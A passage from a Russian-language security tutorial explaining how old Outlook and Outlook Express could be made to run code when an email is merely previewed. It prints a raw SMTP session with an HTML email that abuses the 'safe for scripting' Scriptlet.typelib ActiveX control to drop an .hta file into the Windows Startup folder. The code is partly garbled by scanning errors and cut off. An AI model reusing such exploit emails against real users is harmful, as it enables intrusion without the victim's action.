Иллюстрированный самоучитель по Secure Web


Запуск произвольного кода с помощью электронной почты


При описании следующих атак будут продемонстрированы различные механизмы запуска команд на целевом компьютере. Многие из них приводятся в действие при открытии коварных сообщений или их предварительном просмотре в соответствующей части окна программ Outlook и Outlook Express.

Атаки с использованием элементов ActiveX, помеченных как "safe for scripting"


Взломщики не могли выдумать ничего более убийственного: все, что нужно сделать жертве, — это просто прочитать сообщение (или просмотреть его в окне предварительного просмотра программ Outlook и Outlook Express, если такая возможность имеется). При этом со стороны пользователя не требуется никакого вмешательства. Эта чудовищная "простота" снова появилась благодаря элементу управления Scriptlet. typelib, помеченному как "safe for scripting" (более подробно этот вопрос обсуждается в разделе, посвященном элементам ActiveX). С такой же легкостью можно использовать Eyegod.ocx, но метод, рассматриваемый в данном разделе, основан на применении проверочного кода Георгия Гунински, в котором используется элемент управления Scriptlet. typelib. Напомним, что Георгий поместил этот код на своем Web-узле. Ниже приведена слегка модифицированная версия этого кода, вставленного в капсулу для взлома почты.

helo somedomain.com

mail from: <mallory@malweary.com>

rcpt to: <hapless@victim.net>

data

subject: Ya gotta read this!

MIME-Version: 1.0

Content-Type: text/html; charset=us-ascii

Content-Transfer-Encoding: 7bit

If you have received this message in error, please delete it.

<object id="scr"

classid="clsid:06290BD5-48AA-llD2-8432-006008C3FBFC">

</object>

<SCRIPT>

scr.Reset();

scr.Path="C:\\WIN98\\start

menu\\programs\\startup\\guninski.hta";

scr.Doc="<object id='wsh'

classid='clsid:F935DC22-1CFO-11DO-ADB9-

OOC04FD58AOB'x/object><SCRIPT>alert

{

' Written by Georgi Guninski

);</" + "SCRIP

T>";



Начало  Назад  Вперед



Книжный магазин